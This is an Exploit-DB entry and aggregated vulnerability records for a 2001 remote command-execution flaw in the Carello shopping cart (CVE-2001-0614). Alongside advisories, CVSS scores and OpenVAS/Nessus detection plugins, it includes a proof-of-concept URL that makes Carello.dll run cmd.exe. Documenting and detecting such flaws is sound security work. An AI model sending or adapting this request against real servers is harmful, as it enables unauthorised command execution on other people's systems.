ID: EDB-ID:20850
Type: exploitdb
Reporter: Peter Gründl
Modified: 2001-05-14T00:00:00
Description
Pacific Software Carello 1.2.1 Shopping Cart Command Execution Vulnerability. CVE-2001-0614. Remote exploit for the Windows platform.
source: http://www.securityfocus.com/bid/2729/info
It is possible for a remote user to execute arbitrary commands on a host using Carello Shopping Cart software. A specially crafted HTTP request could cause inetinfo.exe to consume all available system resources, refusing any new connections. If arbitrary code is part of the HTTP request, it will be executed with the privileges of the web server.
http://foo.org/scripts/Carello/Carello.dllCARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe20/c20echo20test>c:\defcom.txt
{"cve": [{"lastseen": "2020-12-09T19:19:25", "description": "Carello E-Commerce 1.2.1 and earlier allows a remote attacker to gain additional privileges and execute arbitrary commands via a specially constructed URL.", "edition": 5, "cvss3": {}, "published": "2001-08-22T04:00:00", "title": "CVE-2001-0614", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2001-0614"], "modified": "2017-12-19T02:29:00", "cpe": ["cpe:/a:carello:e-commerce:1.2.1"], "id": "CVE-2001-0614", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0614", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:carello:e-commerce:1.2.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:01", "bulletinFamily": "software", "cvelist": ["CVE-2001-0614"], "edition": 1, "description": "## Vulnerability Description\nCarello contains a flaw that may allow a malicious user to execute arbitrary code or cause a denial of service. The issue is triggered when a specially crafted HTTP request is sent to the Carello.dll library. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nCarello contains a flaw that may allow a malicious user to execute arbitrary code or cause a denial of service. 
The issue is triggered when a specially crafted HTTP request is sent to the Carello.dll library. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.\n## Manual Testing Notes\nhttp://[victim]/scripts/Carello/Carello.dllCARELLOCODE=SITE2&VBEXE=C:\\..\\winnt\\system32\\cmd.exe20/c20echo20test>c:\\defcom.txt\n\n## References:\nVendor URL: http://www.carelloweb.com/\n[Nessus Plugin ID:11776](https://vulners.com/search?query=pluginID:11776)\nMail List Post: http://www.securityfocus.com/advisories/3311\nKeyword: def-2001-25\nISS X-Force ID: 6532\n[CVE-2001-0614](https://vulners.com/cve/CVE-2001-0614)\nBugtraq ID: 2729\n", "modified": "2001-05-14T00:00:00", "published": "2001-05-14T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6591", "id": "OSVDB:6591", "type": "osvdb", "title": "Carello E-Commerce Carello.dll Command Execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-05-08T08:39:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0614"], "description": "Carello.dll was found on the remote web server.", "modified": "2020-05-05T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231011776", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011776", "type": "openvas", "title": "Carello detection", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Carello detection\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11776\");\n script_version(\"2020-05-05T09:44:01+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2729);\n script_cve_id(\"CVE-2001-0614\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Carello detection\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2003 Michel Arboi\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest version if necessary.\");\n\n script_tag(name:\"summary\", value:\"Carello.dll was found on the remote web server.\");\n\n script_tag(name:\"insight\", value:\"Versions up to 1.3 of this web shopping cart allowed\n anybody to run arbitrary commands on your server.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\n\nres = http_is_cgi_installed_ka( item:\"Carello.dll\", port:port );\nif( res ) {\n security_message( 
port:port );\n}\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-08T11:44:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0614"], "description": "Carello.dll was found on your web server. \nVersions up to 1.3 of this web shopping cart allowed anybody\nto run arbitrary commands on your server.\n\n*** Note that no attack was performed, and the version number was\n*** not checked, so this might be a false alert", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:11776", "href": "http://plugins.openvas.org/nasl.php?oid=11776", "type": "openvas", "title": "Carello detection", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: carello.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: Carello detection\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"Carello.dll was found on your web server. 
\nVersions up to 1.3 of this web shopping cart allowed anybody\nto run arbitrary commands on your server.\n\n*** Note that no attack was performed, and the version number was\n*** not checked, so this might be a false alert\";\n\ntag_solution = \"Upgrade to the latest version if necessary\";\n\n# References:\n#\n# Date: Wed, 02 Oct 2002 17:10:21 +0100\n# From: \"Matt Moore\" <matt@westpoint.ltd.uk>\n# To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org\n# Subject: wp-02-0012: Carello 1.3 Remote File Execution (Updated 1/10/2002)\n#\n# http://www.westpoint.ltd.uk/advisories/wp-02-0012.txt\n\nif(description)\n{\n script_id(11776);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2729);\n script_cve_id(\"CVE-2001-0614\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n name = \"Carello detection\";\n\n script_name(name);\n \n\n \n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(\"This script is Copyright (C) 2003 Michel Arboi\");\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# Please note that it is possible to test this vulnerability, but\n# I suspect that Carello is not widely used, and I am lazy :-)\n# \ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"global_settings.inc\");\n\nport = get_http_port(default:80);\n\nres = is_cgi_installed_ka(item:\"Carello.dll\", port:port);\nif (res) security_message(port);\n", 
"cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T01:22:02", "description": "The remote host appears to be running Carello.dll, a web-based\nshopping cart.\n\nVersions up to 1.3 of this web shopping cart have a command execution\nvulnerability. This could allow a remote attacker to run arbitrary\ncommands on the system with the privileges of the web server.\n\n*** Note that no attack was performed, and the version number was ***\nnot checked, so this might be a false alert", "edition": 23, "published": "2003-06-26T00:00:00", "title": "Carello E-Commerce Carello.dll Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0614"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "CARELLO.NASL", "href": "https://www.tenable.com/plugins/nessus/11776", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11776);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/11/15 20:50:16\");\n\n script_cve_id(\"CVE-2001-0614\");\n script_bugtraq_id(2729);\n\n script_name(english:\"Carello E-Commerce Carello.dll Command Execution\");\n script_summary(english:\"Checks for the presence of carello.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote web application has a command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running Carello.dll, a web-based\nshopping cart.\n\nVersions up to 1.3 of this web shopping cart have a command execution\nvulnerability. 
This could allow a remote attacker to run arbitrary\ncommands on the system with the privileges of the web server.\n\n*** Note that no attack was performed, and the version number was ***\nnot checked, so this might be a false alert\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.westpoint.ltd.uk/advisories/wp-02-0012.txt\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to the latest version of the software.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/06/26\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n#\n# Please note that it is possible to test this vulnerability, but\n# I suspect that Carello is not widely used, and I am lazy :-)\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80);\nres = is_cgi_installed3(item:\"Carello.dll\", port:port);\nif (res) security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}